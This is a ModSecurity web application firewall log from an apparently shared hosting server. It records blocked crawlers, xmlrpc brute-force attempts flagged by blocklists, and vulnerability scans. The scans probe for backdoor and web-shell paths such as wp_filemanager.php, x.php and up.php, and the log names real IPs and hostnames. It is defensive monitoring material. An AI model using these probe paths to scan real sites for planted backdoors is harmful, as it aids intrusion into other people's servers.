[Tue May 26 14:43:43.035984 2026] [security2:error] [pid 636820:tid 636960] [client 216.244.66.241:34194] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/item_list.html"] [unique_id "ahVkR6_r6oOphPch7B-KugAAAAo"]
[Tue May 26 14:43:43.036145 2026] [security2:error] [pid 636820:tid 636960] [client 216.244.66.241:34194] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/item_list.html"] [unique_id "ahVkR6_r6oOphPch7B-KugAAAAo"]
[Tue May 26 14:43:43.862146 2026] [security2:error] [pid 636820:tid 636961] [client 216.244.66.241:60638] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/item_list.html"] [unique_id "ahVkR6_r6oOphPch7B-K0wAAAAs"]
[Tue May 26 14:43:43.862282 2026] [security2:error] [pid 636820:tid 636961] [client 216.244.66.241:60638] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/item_list.html"] [unique_id "ahVkR6_r6oOphPch7B-K0wAAAAs"]
[Tue May 26 14:43:44.023201 2026] [security2:error] [pid 636820:tid 637025] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkR6_r6oOphPch7B-KygAAAEs"]
[Tue May 26 14:43:44.526585 2026] [security2:error] [pid 636820:tid 637045] [client 202.141.83.254:19880] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkSK_r6oOphPch7B-K5QAAAF8"]
[Tue May 26 14:43:44.526768 2026] [security2:error] [pid 636820:tid 637045] [client 202.141.83.254:19880] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkSK_r6oOphPch7B-K5QAAAF8"]
[Tue May 26 14:43:44.742435 2026] [security2:error] [pid 636820:tid 636973] [client 216.244.66.241:60652] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/item_list.html"] [unique_id "ahVkSK_r6oOphPch7B-K7AAAABc"]
[Tue May 26 14:43:44.742546 2026] [security2:error] [pid 636820:tid 636973] [client 216.244.66.241:60652] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/item_list.html"] [unique_id "ahVkSK_r6oOphPch7B-K7AAAABc"]
[Tue May 26 14:43:44.761928 2026] [security2:error] [pid 636820:tid 637049] [client 85.208.96.210:17890] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/pages/services-modern/"] [unique_id "ahVkSK_r6oOphPch7B-K7wAAAGM"]
[Tue May 26 14:43:44.762048 2026] [security2:error] [pid 636820:tid 637049] [client 85.208.96.210:17890] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/pages/services-modern/"] [unique_id "ahVkSK_r6oOphPch7B-K7wAAAGM"]
[Tue May 26 14:43:45.295835 2026] [security2:error] [pid 636820:tid 636986] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkSK_r6oOphPch7B-K9AAAACQ"]
[Tue May 26 14:43:45.591947 2026] [security2:error] [pid 636820:tid 636965] [client 216.244.66.241:60660] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/item_list.html"] [unique_id "ahVkSa_r6oOphPch7B-LDwAAAA8"]
[Tue May 26 14:43:45.592085 2026] [security2:error] [pid 636820:tid 636965] [client 216.244.66.241:60660] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/item_list.html"] [unique_id "ahVkSa_r6oOphPch7B-LDwAAAA8"]
[Tue May 26 14:43:46.407976 2026] [security2:error] [pid 636820:tid 636968] [client 216.244.66.241:60670] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/item_list.html"] [unique_id "ahVkSq_r6oOphPch7B-LJQAAABI"]
[Tue May 26 14:43:46.408073 2026] [security2:error] [pid 636820:tid 636968] [client 216.244.66.241:60670] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/item_list.html"] [unique_id "ahVkSq_r6oOphPch7B-LJQAAABI"]
[Tue May 26 14:43:47.236411 2026] [security2:error] [pid 636820:tid 637018] [client 216.244.66.241:60676] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/item_list.html"] [unique_id "ahVkS6_r6oOphPch7B-LOwAAAEQ"]
[Tue May 26 14:43:47.236519 2026] [security2:error] [pid 636820:tid 637018] [client 216.244.66.241:60676] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/item_list.html"] [unique_id "ahVkS6_r6oOphPch7B-LOwAAAEQ"]
[Tue May 26 14:43:48.013435 2026] [security2:error] [pid 636820:tid 637025] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkS6_r6oOphPch7B-LTQAAAEs"]
[Tue May 26 14:43:48.104544 2026] [security2:error] [pid 636820:tid 636982] [client 216.244.66.241:60684] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/special/patek-philippe/165/"] [unique_id "ahVkTK_r6oOphPch7B-LXwAAACA"]
[Tue May 26 14:43:48.104708 2026] [security2:error] [pid 636820:tid 636982] [client 216.244.66.241:60684] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/special/patek-philippe/165/"] [unique_id "ahVkTK_r6oOphPch7B-LXwAAACA"]
[Tue May 26 14:43:48.215119 2026] [security2:error] [pid 636820:tid 637049] [client 20.12.194.227:59657] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.careerslngulf.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVkTK_r6oOphPch7B-LYwAAAGM"]
[Tue May 26 14:43:48.215250 2026] [security2:error] [pid 636820:tid 637049] [client 20.12.194.227:59657] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.careerslngulf.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVkTK_r6oOphPch7B-LYwAAAGM"]
[Tue May 26 14:43:48.342248 2026] [security2:error] [pid 636820:tid 636970] [client 20.12.194.227:64851] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 227.194.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.careerslngulf.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahVkTK_r6oOphPch7B-LagAAABQ"]
[Tue May 26 14:43:48.342363 2026] [security2:error] [pid 636820:tid 636970] [client 20.12.194.227:64851] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.careerslngulf.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahVkTK_r6oOphPch7B-LagAAABQ"]
[Tue May 26 14:43:49.372800 2026] [security2:error] [pid 636820:tid 636994] [client 213.180.203.90:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVkTa_r6oOphPch7B-LggAAACw"]
[Tue May 26 14:43:49.934288 2026] [security2:error] [pid 636820:tid 637073] [client 2.58.56.223:53308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVkTa_r6oOphPch7B-LlAAAAHs"], referer: www.google.com
[Tue May 26 14:43:49.938420 2026] [security2:error] [pid 636820:tid 636981] [client 2.58.56.223:53599] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahVkTa_r6oOphPch7B-LmAAAAB8"]
[Tue May 26 14:43:49.948746 2026] [security2:error] [pid 636820:tid 636997] [client 2.58.56.223:53271] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-plain.php"] [unique_id "ahVkTa_r6oOphPch7B-LlgAAAC8"], referer: www.google.com
[Tue May 26 14:43:50.240456 2026] [security2:error] [pid 636820:tid 636976] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkTa_r6oOphPch7B-LkgAAABo"]
[Tue May 26 14:43:50.253191 2026] [security2:error] [pid 636820:tid 636985] [client 2.58.56.223:60977] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/pnvanupj.php"] [unique_id "ahVkTq_r6oOphPch7B-LpAAAACM"], referer: www.google.com
[Tue May 26 14:43:50.386806 2026] [security2:error] [pid 636820:tid 636982] [client 2.58.56.223:51831] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVkTq_r6oOphPch7B-LqgAAACA"], referer: www.google.com
[Tue May 26 14:43:50.746960 2026] [security2:error] [pid 636820:tid 637027] [client 2.58.56.223:62065] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-plain.php"] [unique_id "ahVkTq_r6oOphPch7B-LtAAAAE0"], referer: www.google.com
[Tue May 26 14:43:51.161496 2026] [security2:error] [pid 636820:tid 637064] [client 154.161.32.97:46559] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVkT6_r6oOphPch7B-LuwAAAHI"]
[Tue May 26 14:43:51.161635 2026] [security2:error] [pid 636820:tid 637064] [client 154.161.32.97:46559] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVkT6_r6oOphPch7B-LuwAAAHI"]
[Tue May 26 14:43:51.193806 2026] [security2:error] [pid 636820:tid 637016] [client 2.58.56.223:63567] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/zkrfphhq.php"] [unique_id "ahVkT6_r6oOphPch7B-LwAAAAEI"], referer: www.google.com
[Tue May 26 14:43:51.412181 2026] [security2:error] [pid 636820:tid 636981] [client 2.58.56.223:53035] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahVkTa_r6oOphPch7B-LlQAAADg"], referer: www.google.com
[Tue May 26 14:43:51.735831 2026] [security2:error] [pid 636820:tid 636960] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkT6_r6oOphPch7B-LyAAAAAo"]
[Tue May 26 14:43:51.823927 2026] [security2:error] [pid 636820:tid 636969] [client 2.58.56.223:53035] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahVkT6_r6oOphPch7B-L0gAAABM"], referer: www.google.com
[Tue May 26 14:43:51.942805 2026] [security2:error] [pid 636820:tid 637035] [client 2.58.56.223:54123] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVkT6_r6oOphPch7B-L3QAAAFU"]
[Tue May 26 14:43:52.231687 2026] [security2:error] [pid 636820:tid 636953] [client 2.58.56.223:61007] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVkUK_r6oOphPch7B-L6QAAAAM"]
[Tue May 26 14:43:52.536498 2026] [security2:error] [pid 636820:tid 636971] [client 2.58.56.223:52384] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVkUK_r6oOphPch7B-L9QAAABU"]
[Tue May 26 14:43:52.833581 2026] [security2:error] [pid 636820:tid 637054] [client 2.58.56.223:59652] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bookmyitem.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVkUK_r6oOphPch7B-MAAAAAGg"]
[Tue May 26 14:43:53.734195 2026] [security2:error] [pid 636820:tid 636982] [client 138.229.111.188:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVkUa_r6oOphPch7B-MIwAAACA"], referer: https://www.anujtradingco.com/
[Tue May 26 14:43:54.085430 2026] [security2:error] [pid 636820:tid 637034] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkUa_r6oOphPch7B-MJgAAAFQ"]
[Tue May 26 14:43:54.178087 2026] [security2:error] [pid 636820:tid 636983] [client 20.197.193.33:55654] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVkUq_r6oOphPch7B-MOAAAACE"]
[Tue May 26 14:43:54.178277 2026] [security2:error] [pid 636820:tid 636983] [client 20.197.193.33:55654] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dprassurance.lk"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVkUq_r6oOphPch7B-MOAAAACE"]
[Tue May 26 14:43:54.441256 2026] [security2:error] [pid 636820:tid 637006] [client 114.119.133.46:57239] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "m2wealthadvisor.com"] [uri "/our-privacy-policy/index.html"] [unique_id "ahVkUq_r6oOphPch7B-MQgAAADg"], referer: http://m2wealthadvisor.com/
[Tue May 26 14:43:54.946165 2026] [security2:error] [pid 636820:tid 636988] [client 195.178.110.34:41220] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.consultrgb.com"] [uri "/_profiler/phpinfo/info.php"] [unique_id "ahVkUq_r6oOphPch7B-MSQAAACY"]
[Tue May 26 14:43:55.188130 2026] [security2:error] [pid 636820:tid 637031] [client 20.197.193.33:55626] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dprassurance.lk"] [uri "/x.php"] [unique_id "ahVkU6_r6oOphPch7B-MVQAAAFE"]
[Tue May 26 14:43:55.188246 2026] [security2:error] [pid 636820:tid 637031] [client 20.197.193.33:55626] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dprassurance.lk"] [uri "/x.php"] [unique_id "ahVkU6_r6oOphPch7B-MVQAAAFE"]
[Tue May 26 14:43:55.237631 2026] [security2:error] [pid 636820:tid 637029] [client 202.141.83.254:53891] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkU6_r6oOphPch7B-MUQAAAE8"]
[Tue May 26 14:43:55.237839 2026] [security2:error] [pid 636820:tid 637029] [client 202.141.83.254:53891] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkU6_r6oOphPch7B-MUQAAAE8"]
[Tue May 26 14:43:55.787415 2026] [security2:error] [pid 636820:tid 637046] [client 84.233.216.142:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "bigpapaairbnbhotel.com"] [uri "/index.php"] [unique_id "ahVkU6_r6oOphPch7B-MXwAAYCk"]
[Tue May 26 14:43:55.934854 2026] [security2:error] [pid 636820:tid 637072] [client 138.229.111.188:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVkU6_r6oOphPch7B-MagAAAHo"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1227654&moderation-hash=8715c559f2144bd8b23e288aa5bf6c79
[Tue May 26 14:43:56.271732 2026] [security2:error] [pid 636820:tid 637062] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkU6_r6oOphPch7B-MawAAAHA"]
[Tue May 26 14:43:56.683857 2026] [security2:error] [pid 636820:tid 637068] [client 84.233.216.142:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bigpapaairbnbhotel.com"] [uri "/index.php"] [unique_id "ahVkVK_r6oOphPch7B-MdQAAdnU"]
